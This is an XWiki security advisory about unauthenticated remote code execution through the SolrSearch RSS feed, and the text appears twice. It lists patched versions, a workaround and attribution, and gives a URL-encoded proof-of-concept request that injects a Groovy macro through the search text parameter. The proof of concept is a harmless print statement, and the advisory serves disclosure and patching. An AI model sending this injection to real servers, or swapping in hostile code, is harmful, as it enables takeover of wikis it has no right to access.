Impact
Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation.
To reproduce on an instance, without being logged in, go to <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable.
Patches
This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1.
Workarounds
This line in Main.SolrSearchMacros can be edited to match the rawResponse macro defined here with a content type of application/xml, instead of simply outputting the content of the feed.
References
Attribution
This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative.
Impact
Any guest can perform arbitrary remote code execution through a request to
SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation.To reproduce on an instance, without being logged in, go to
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed containsHello from search text:42, then the instance is vulnerable.Patches
This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1.
Workarounds
This line in
Main.SolrSearchMacroscan be edited to match therawResponsemacro defined here with a content type ofapplication/xml, instead of simply outputting the content of the feed.References
Attribution
This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative.